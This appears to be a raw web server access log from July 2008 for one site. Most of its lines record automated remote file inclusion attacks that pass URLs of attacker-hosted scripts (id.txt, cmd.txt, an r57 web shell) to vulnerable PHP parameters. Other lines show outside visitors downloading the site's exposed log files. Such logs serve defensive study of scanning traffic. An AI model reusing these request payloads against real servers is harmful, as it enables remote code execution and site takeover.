207.44.230.33 - - [29/Jul/2008:09:00:03 -0700] "GET /logs/access_080207.log///vwar/backup/errors.php?error=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [29/Jul/2008:09:00:03 -0700] "GET ///vwar/backup/errors.php?error=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [29/Jul/2008:09:00:03 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.97.229.104 - - [29/Jul/2008:09:00:14 -0700] "GET /logs/access_080225.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.97.229.104 - - [29/Jul/2008:09:00:14 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.97.229.104 - - [29/Jul/2008:09:00:15 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.97.229.104 - - [29/Jul/2008:09:00:23 -0700] "GET /logs/access_080207.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.59.31.140 - - [29/Jul/2008:09:00:58 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
207.44.230.33 - - [29/Jul/2008:09:01:28 -0700] "GET /logs/access_080315.log///vwar/backup/errors.php?error=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:01:30 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:01:33 -0700] "GET //skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:01:36 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.186.1.54 - - [29/Jul/2008:09:01:51 -0700] "GET /logs/access_080315.log///vwar/backup/errors.php?error=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:09:01:56 -0700] "GET /logs/access_080212.log/?sourcedir=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.169.0.50 - - [29/Jul/2008:09:02:27 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.spanishvida.com//admin/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
62.169.0.50 - - [29/Jul/2008:09:02:27 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.spanishvida.com//admin/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:02:32 -0700] "GET /logs/access_080315.log/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:02:33 -0700] "GET /errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:02:33 -0700] "GET /logs/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.178.228.12 - - [29/Jul/2008:09:02:37 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
193.178.228.12 - - [29/Jul/2008:09:02:37 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dantman.com/.../rid? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:02:37 -0700] "GET /logs/access_080315.log/errors.php?error=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:02:37 -0700] "GET /errors.php?error=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:02:38 -0700] "GET /logs/errors.php?error=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.15.10.22 - - [29/Jul/2008:09:02:38 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
204.15.10.22 - - [29/Jul/2008:09:02:38 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:02:52 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:02:53 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:02:53 -0700] "GET /errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:02:53 -0700] "GET /errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.218.250.106 - - [29/Jul/2008:09:02:53 -0700] "GET /logs/access_080315.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.218.250.106 - - [29/Jul/2008:09:02:53 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:04 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:04 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:05 -0700] "GET /errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:05 -0700] "GET /errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:05 -0700] "GET /logs/errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:05 -0700] "GET /logs/errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:11 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:13 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:09:03:18 -0700] "GET /logs/access.log//errors.php?error=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:09:03:20 -0700] "GET //errors.php?error=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:09:03:24 -0700] "GET /logs//errors.php?error=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:44 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:44 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:44 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:45 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:46 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:47 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:47 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:47 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:49 -0700] "GET /errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:03:50 -0700] "GET /errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.186.1.54 - - [29/Jul/2008:09:04:02 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [29/Jul/2008:09:04:02 -0700] "GET /phphtml.php?htmlclass_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [29/Jul/2008:09:04:02 -0700] "GET /logs/phphtml.php?htmlclass_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:04:47 -0700] "GET /logs/access_080315.log/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:04:47 -0700] "GET /errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:04:48 -0700] "GET /logs/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.16.126.2 - - [29/Jul/2008:09:04:54 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:04:58 -0700] "GET /logs/access_080207.log/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:04:58 -0700] "GET /logs/access_080207.log/errors.php?error=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.24.5.54 - - [29/Jul/2008:09:05:07 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.18.28.130 - - [29/Jul/2008:09:05:07 -0700] "GET /logs/access_080114.log HTTP/1.0" 200 566288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
192.192.35.235 - - [29/Jul/2008:09:05:07 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.108.67.156 - - [29/Jul/2008:09:05:08 -0700] "GET /logs//errors.php?error=http://linknetcrew.com/source/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.156 - - [29/Jul/2008:09:05:09 -0700] "GET //errors.php?error=http://linknetcrew.com/source/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.33.1.189 - - [29/Jul/2008:09:05:28 -0700] "GET /logs//appserv/errors.php?error=http://www.fallauna.com/coprald/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
84.33.1.189 - - [29/Jul/2008:09:05:28 -0700] "GET //appserv/errors.php?error=http://www.fallauna.com/coprald/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
92.114.163.184 - - [29/Jul/2008:09:05:28 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
195.5.163.212 - - [29/Jul/2008:09:05:32 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.5.163.212 - - [29/Jul/2008:09:05:32 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:09:05:37 -0700] "GET /bikes/dteel/2008_02_15/?S=D HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.34.238 - - [29/Jul/2008:09:05:39 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.97.0.11 - - [29/Jul/2008:09:05:54 -0700] "GET /logs/access_080315.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.186.1.54 - - [29/Jul/2008:09:05:59 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:09:05:59 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:09:06:00 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:09:06:00 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:06:02 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:06:08 -0700] "GET /logs/access_080207.log//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:06:09 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.221.217.142 - - [29/Jul/2008:09:06:28 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 405504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
205.234.198.225 - - [29/Jul/2008:09:06:32 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.225 - - [29/Jul/2008:09:06:32 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.225 - - [29/Jul/2008:09:06:33 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.225 - - [29/Jul/2008:09:06:45 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.225 - - [29/Jul/2008:09:06:45 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.198.225 - - [29/Jul/2008:09:06:46 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:06:56 -0700] "GET /logs/errors.php?error=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:06:56 -0700] "GET /errors.php?error=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:09:07:13 -0700] "GET /logs/access_080207.log/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.97.229.104 - - [29/Jul/2008:09:07:51 -0700] "GET /logs/access_080118.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.97.229.104 - - [29/Jul/2008:09:07:52 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.97.229.104 - - [29/Jul/2008:09:07:53 -0700] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.186.1.54 - - [29/Jul/2008:09:08:01 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [29/Jul/2008:09:08:01 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.186.192.164 - - [29/Jul/2008:09:08:09 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://beherit.interfree.it/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.186.1.54 - - [29/Jul/2008:09:08:11 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.186.192.164 - - [29/Jul/2008:09:08:13 -0700] "GET //index.php?DOCUMENT_ROOT=http://beherit.interfree.it/cmd.txt?? HTTP/1.1" 200 18413 "-" "libwww-perl/5.805" "www.dmulk.com"
213.186.192.164 - - [29/Jul/2008:09:08:14 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://beherit.interfree.it/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.186.1.54 - - [29/Jul/2008:09:08:31 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.212.179.114 - - [29/Jul/2008:09:08:31 -0700] "GET /logs/access_080315.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mazcotaz.com/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
67.212.179.114 - - [29/Jul/2008:09:08:32 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.mazcotaz.com/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:09:18 -0700] "GET /logs/access_080103.log//skin/zero_vote/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:09:24 -0700] "GET //skin/zero_vote/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:09:28 -0700] "GET /logs//skin/zero_vote/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.186.5 - - [29/Jul/2008:09:09:30 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.186.5 - - [29/Jul/2008:09:09:32 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.186.5 - - [29/Jul/2008:09:09:34 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/lujonies/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.217.242.2 - - [29/Jul/2008:09:09:44 -0700] "GET /logs/access.log%20%20//index.php?DOCUMENT_ROOT=http://www.fieldpaoli.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.165.49.171 - - [29/Jul/2008:09:09:49 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:09:52 -0700] "GET /errors.php?error=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:10:00 -0700] "GET /errors.php?error=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:09:10:08 -0700] "GET /solpot.html?body=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.198.225 - - [29/Jul/2008:09:10:31 -0700] "GET /logs/access_080128.log//modules/vwar/admin/admin.php?vwar_root=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.216.54.84 - - [29/Jul/2008:09:10:34 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 566288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.17.206.178 - - [29/Jul/2008:09:10:43 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
195.42.160.22 - - [29/Jul/2008:09:10:48 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
195.42.160.22 - - [29/Jul/2008:09:10:48 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
195.42.160.22 - - [29/Jul/2008:09:10:49 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:10:50 -0700] "GET /logs/access_080103.log//skin/zero_vote/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:10:54 -0700] "GET //skin/zero_vote/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:10:57 -0700] "GET /logs//skin/zero_vote/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.2.18.19 - - [29/Jul/2008:09:11:02 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 524288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
